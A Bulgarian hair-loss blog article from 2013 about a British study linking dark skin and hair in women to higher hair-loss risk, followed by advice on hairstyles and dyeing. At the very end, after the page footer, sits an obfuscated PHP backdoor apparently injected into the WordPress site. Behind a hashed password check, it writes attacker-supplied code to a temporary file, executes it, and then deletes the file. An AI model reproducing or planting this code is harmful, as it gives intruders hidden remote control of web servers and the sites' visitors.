Косопад при жени с матова кожа и тъмна коса | Косопад

Косопад при жени с тъмни коса и кожа

Жените с тъмна кожа и коса са застрашени три пъти повече от косопад

Последните изследвания на учени от Великобритания установиха, че жените с мургава кожа и тъмна коса са застрашени около три пъти повече от косопад, сравнено с по – светлите представителки на нежния пол. Към момента все още не е установена причината, но се предполага, че това е свързано по някакъв начин с наличието на повече тестостерон.

kosopad-pri-zeni-s-tumna-kosa

Жените с тъмна коса и кожа са по – застрашени от косопад

Цялостната статистика показва, че в световен мащаб от косопад страдат около 40 % от жените. При някои от тях олисяването е пряко следствие от генетична предразположеност, но при други се дължи само и единствено на недостатъчни грижи за косата, както и на прекаляване с козметичните процедури. Така например, твърде честото боядисване и третиране с други химически препарати затруднява работата на фоликулите, изгаря кожата на главата или изтощава космите до краен предел.

Според някои от другите теории, химическите продукти за коса далеч не са единствените виновници за поява на косопад при жените с мургава кожа. За това допринасят и някои прически, като например силно опънатата назад опашка, честото носене косата на кок и други подобни, които увреждат космите по механичен път. Специалистите съветват косата да се носи спусната и да се правят подобни прически само, когато е наистина необходимо.

„Сплитането на плитки, силното опъване назад и високо вдигнатият кок са сред честите причинители за косопад поради механични увреждания. Космите се изтощават и късат, по този начин се нарушава и правилното кръвообращение на скалпа. Пряка опасност предизвикват и честите козметични процедури като къдрене или изправяне, боядисване и прочие. За да е здрава косата ви, носете я колкото може по – често естествено спусната и не прекалявайте с разкрасяването”, споделя д – р Елма Тубиз.

17. май 2013 20:46:18 от Косопад
Категории: Косопад – Статии | Етикети: , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}